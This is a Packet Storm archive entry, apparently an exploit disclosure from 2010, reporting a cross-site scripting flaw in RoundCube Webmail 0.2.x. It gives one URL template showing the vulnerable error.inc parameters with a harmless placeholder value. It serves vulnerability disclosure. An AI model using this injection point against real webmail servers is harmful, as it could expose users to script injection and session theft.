RoundCubeWebmail 0.2.x Cross Site Scripting

2010-01-07T00:00:00
ID PACKETSTORM:84892
Type packetstorm
Reporter Globus
Modified 2010-01-07T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: RoundCube Webmail XSS Voulerability  
# Date: 6.01.2010  
# Author: j4ck & Globus from elitehackers.pl  
# Software Link: Software link : http://roundcube.net/download  
# Version: 0.2.X , | possible voulerability in higher versions.  
# Tested on: *  
# Code :  
  
XSS:  
  
http://[somesite.com]/[roundcube_path]/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123  
  
  
`